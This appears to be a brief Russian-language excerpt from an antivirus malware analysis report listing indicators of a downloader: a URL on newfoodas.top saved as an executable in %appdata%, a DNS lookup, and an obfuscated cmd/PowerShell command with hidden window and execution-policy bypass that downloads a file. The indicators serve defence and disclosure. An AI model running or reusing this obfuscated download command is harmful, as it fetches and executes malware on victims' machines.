Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^wEr^sH^elL.ex^e^ -Ex^ecUT^iO^Np^ol^i^c^Y ^BYpAss -^N^OPrOfil^e -WiN^DoW^s^T^yLe^ HiD^De^n^ (Ne^W-^OB^jECT^ sYSTem.nEt^.^WE^bC^li^eN^t).do^w^nlO^ADfiLe(^'http://newfoodas...
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /c "PO^wEr^sH^elL.ex^e^ -Ex^ecUT^iO^Np^ol^i^c^Y ^BYpAss -^N^OPrOfil^e -WiN^DoW^s^T^yLe^ HiD^De^n^ (Ne^W-^OB^jECT^ sYSTem.nEt^.^WE^bC^li^eN^t).do^w^nlO^ADfiLe(^'http://newfoodas...' (со скрытым окном)